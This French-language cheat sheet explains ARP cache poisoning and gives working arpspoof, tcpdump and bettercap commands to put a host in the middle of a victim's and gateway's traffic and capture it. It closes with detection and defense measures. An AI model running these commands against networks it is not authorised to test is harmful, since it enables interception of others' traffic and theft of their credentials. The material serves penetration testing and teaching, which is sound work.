ARP Spoof — Empoisonnement de cache ARP
Qu'est-ce que l'ARP Spoofing ?
L'ARP Spoofing (ou ARP poisoning) exploite l'absence totale d'authentification du protocole ARP : un attaquant envoie des réponses ARP forgées (gratuitous ARP) pour associer sa propre adresse MAC à l'IP d'une autre machine (souvent la passerelle). Les victimes mettent à jour leur cache ARP avec cette fausse association et envoient leur trafic à l'attaquant sans le savoir — base de la majorité des attaques MITM sur réseau local.
Préparer le poste attaquant
# Activer le routage IP pour relayer le trafic intercepté
echo 1 > /proc/sys/net/ipv4/ip_forward
# Vérifier les tables ARP/voisins avant l attaque
ip neigh show
arp -a Exécution avec arpspoof
# Empoisonner la victime : se faire passer pour la passerelle
arpspoof -i eth0 -t 192.168.1.10 192.168.1.1
# Empoisonner la passerelle : se faire passer pour la victime
# (nécessaire pour intercepter le trafic dans les deux sens)
arpspoof -i eth0 -t 192.168.1.1 192.168.1.10
# Capturer le trafic intercepté
tcpdump -i eth0 -w mitm_capture.pcap host 192.168.1.10 Avec bettercap (full MITM)
bettercap -iface eth0
> set arp.spoof.targets 192.168.1.10
> set arp.spoof.fullduplex true
> arp.spoof on
> net.sniff on
> set net.sniff.verbose true Détection et défenses
Détection arpwatch alerte sur tout changement MAC/IP inattendu · surveiller les gratuitous ARP anormalement fréquents avec Wireshark (filtre arp.opcode==2)
Défenses Dynamic ARP Inspection (DAI) sur switches Cisco — valide les associations IP/MAC via DHCP snooping · entrées ARP statiques pour les hôtes critiques (passerelle) · ports switch en mode port-security · ségrégation VLAN pour réduire la surface d'attaque L2.